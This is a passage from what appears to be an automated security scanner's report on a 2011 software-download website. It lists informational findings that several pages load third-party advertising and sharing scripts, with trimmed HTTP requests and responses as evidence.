<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1459. http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:19:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1460. http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                       <script type="text/javascript"
                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1461. http://www.x64bitdownload.com/drivers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1462. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/64-bit-vista-drivers.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1463. http://www.x64bitdownload.com/featured-software.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/featured-software.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:32:35 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 29094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1464. http://www.x64bitdownload.com/linktous.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/linktous.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1465. http://www.x64bitdownload.com/new-reviews.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/new-reviews.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:33:26 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 56251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1466. http://www.x64bitdownload.com/new-software.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/new-software.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:33:21 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 120254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1467. http://www.x64bitdownload.com/saved-software.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/saved-software.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1468. http://www.x64bitdownload.com/screenshot/communitymate-download-qeakzpwv.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/communitymate-download-qeakzpwv.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/communitymate-download-qeakzpwv.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:14 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1469. http://www.x64bitdownload.com/screenshot/news-file-grabber-download-stclytop.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/news-file-grabber-download-stclytop.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/news-file-grabber-download-stclytop.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:29 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 9015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1470. http://www.x64bitdownload.com/screenshot/newsgroup-commander-pro-download-rjfsmxpp.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/newsgroup-commander-pro-download-rjfsmxpp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:34 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 9009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1471. http://www.x64bitdownload.com/screenshot/ozum-download-lhtivuds.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/ozum-download-lhtivuds.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:43:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:52 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1472. http://www.x64bitdownload.com/screenshot/paragon-extbrowser-download-xwigzbic.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/paragon-extbrowser-download-xwigzbic.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/paragon-extbrowser-download-xwigzbic.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:54:42 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1473. http://www.x64bitdownload.com/screenshot/rss-reader-download-avwkinlm.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/rss-reader-download-avwkinlm.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/rss-reader-download-avwkinlm.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:54:49 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1474. http://www.x64bitdownload.com/screenshot/trollkiller-for-firefox-download-ydeukbjf.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/trollkiller-for-firefox-download-ydeukbjf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:08 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1475. http://www.x64bitdownload.com/screenshot/usenext-download-rizftkeg.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/usenext-download-rizftkeg.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/usenext-download-rizftkeg.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:54:15 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1476. http://www.x64bitdownload.com/screenshot/web-forum-reader-download-ivzgszuq.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/web-forum-reader-download-ivzgszuq.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/web-forum-reader-download-ivzgszuq.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:36 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1477. http://www.x64bitdownload.com/screenshot/web-forum-reader-download-sqifmyiy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/web-forum-reader-download-sqifmyiy.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /screenshot/web-forum-reader-download-sqifmyiy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:09 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 8751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
